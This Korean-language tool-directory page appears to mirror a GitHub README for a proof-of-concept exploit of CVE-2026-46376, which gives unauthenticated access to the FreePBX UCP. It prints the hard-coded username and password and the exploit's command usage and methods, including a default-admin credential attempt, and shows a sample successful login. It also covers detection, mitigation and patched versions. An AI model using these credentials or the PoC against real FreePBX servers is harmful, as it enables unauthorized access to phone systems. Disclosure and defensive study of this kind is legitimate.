Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-46376 — CVE-2026-46376 - FreePBX 하드코딩된 자격 증명을 통한 비인증 UCP 접근 | Kitploit
도구/GitHubGitHub/portbuster1337/cve-2026-46376
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingAuthenticationPapers & ResearchLearning & Education
GitHubportbuster1337/cve-2026-46376

CVE-2026-46376

CVE-2026-46376 - FreePBX 하드코딩된 자격 증명을 통한 비인증 UCP 접근

저장소 보기
2개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-46376 — 하드코딩된 자격 증명을 통한 FreePBX 인증되지 않은 UCP 접근

FreePBX의 사용자 관리(userman) 모듈의 치명적인 취약점으로, 인증되지 않은 공격자가 UCP 일반 템플릿 설정 과정에서 포함되는 하드코딩된 자격 증명을 사용하여 사용자 제어 패널(UCP)에 접근할 수 있습니다.

CVSS v4.0: 9.1 (치명적) | CWE-798: 하드코딩된 자격 증명 사용

공개일: 2026년 5월 15일 | 보고자: s0nnyWT

세부 정보

관리자가 선택적 UCP 일반 템플릿 설정 기능(2021년 도입)을 사용하면 FreePBXUCPTemplateCreator라는 시스템 사용자가 하드코딩된 고정 비밀번호로 생성됩니다. 설정 후 관리자가 이 비밀번호를 변경하지 않으면 네트워크의 모든 인증되지 않은 사용자가 이 자격 증명으로 UCP에 로그인할 수 있습니다.

필드값
사용자 이름FreePBXUCPTemplateCreator
비밀번호1a2b3c@fd48jshs03123ld
소스Userman.class.php — 비밀번호가 md5()를 통해 전달됨
공격 경로네트워크
복잡성낮음
인증 필요없음
사용자 상호작용없음
전제 조건관리자가 UCP 일반 템플릿 설정을 실행해야 함

참고: FreePBXUCPTemplateCreator 사용자는 관리자가 UCP 일반 템플릿 설정 기능을 명시적으로 실행한 경우에만 생성됩니다. 이 설정을 한 번도 수행하지 않은 시스템은 영향을 받는 버전을 실행 중이더라도 이 CVE를 통해 악용할 수 없습니다.

영향을 받는 버전

수정 패치는 설치/업그레이드 시 bin2hex(random_bytes(24))를 사용하여 비밀번호를 무작위화하며, 기존 템플릿 생성자는 업그레이드 시 비밀번호가 다시 생성됩니다.

PoC 사용법

root@kitploit:~
pip3 install requests
python3 poc.py <target_url>

옵션

root@kitploit:~
positional arguments:
  target              Target URL (e.g. http://192.168.1.100)

optional arguments:
  -h, --help          show this help message and exit
  --no-check          Skip version pre-flight check
  --timeout TIMEOUT   Request timeout in seconds (default: 15)
  --method {creds,unlock,admin,all}
                      Which exploit method to run (default: all)
  -y, --yes           Auto-continue even if version is out of range

방법

  1. creds — 하드코딩된 자격 증명을 사용하여 module=User&command=login과 함께 POST /ucp/ajax.php에 로그인 요청을 보내 UCP에 로그인
  2. unlock — ?unlockkey=&templateid= 쿼리 매개변수를 통한 잠금 해제 키 우회 시도
  3. admin — ACP에서 일반적인 기본 관리자 자격 증명 시도

예시

root@kitploit:~
$ python3 poc.py http://192.168.1.100

============================================
  CVE-2026-46376 PoC - FreePBX UCP Access
  Target: http://192.168.1.100
============================================

[+] Target is reachable (HTTP 200)
[+] FreePBX version: 16.0.30
[+] Version 16.0.30 is in the affected range
[+] UCP interface is accessible

============================================
  Exploitation
============================================

============================================
  Method 1: Hard-Coded UCP Credentials
============================================
    Username: FreePBXUCPTemplateCreator
    Password: 1a2b3c@fd48jshs03123ld
[+] Got CSRF token: a749bea059fa66bd32087a8481a4d07b
[+] SUCCESS! Logged in as FreePBXUCPTemplateCreator

============================================
  Summary
============================================
Target is VULNERABLE

탐지

시스템이 악용 가능한지 확인하기 위해 PoC는 자격 증명과 함께 POST /ucp/ajax.php에 module=User&command=login 로그인 요청을 전송합니다. {"status":true} 응답은 템플릿 생성자 사용자가 존재하고 비밀번호가 여전히 기본값임을 나타냅니다.

{"status":false,"message":"Invalid Login Credentials"} 응답은 다음 중 하나를 의미합니다:

  • 사용자가 존재하지 않음(템플릿 설정이 실행된 적 없음), 또는
  • 비밀번호가 이미 교체됨

완화 조치

  • userman 모듈을 16.0.45(FreePBX 16) 또는 17.0.7(FreePBX 17)로 업데이트
  • 기존 UCP 템플릿 자격 증명을 확인하고 교체 — 패치는 이미 배포된 비밀번호를 소급하여 변경하지 않음
  • FreePBX 방화벽 모듈을 사용하여 ACP/UCP 접근을 신뢰할 수 있는 네트워크로 제한
  • 추가 인증 계층을 위해 MFA 또는 SAML 활성화
  • 승인되지 않은 로그인을 확인하기 위해 활성 UCP 세션 감사

면책 조항

이 PoC는 교육 및 승인된 보안 테스트 목적으로만 제공됩니다. 소유하지 않았거나 명시적 테스트 허가를 받지 않은 시스템에 이 익스플로잇을 무단 사용하는 것은 불법입니다. 저자는 이 도구로 인한 오용이나 피해에 대해 책임을 지지 않습니다.

참고 자료

  • GHSA-m55x-h47x-v3gx
  • NVD - CVE-2026-46376
  • FreePBX userman 커밋 (도입)
도구 다운로드
플랫폼userman 모듈영향받는 버전패치 버전
FreePBX 15—15.0.42+해당 없음
FreePBX 16userman≤ 16.0.4416.0.45
FreePBX 17userman≤ 17.0.617.0.7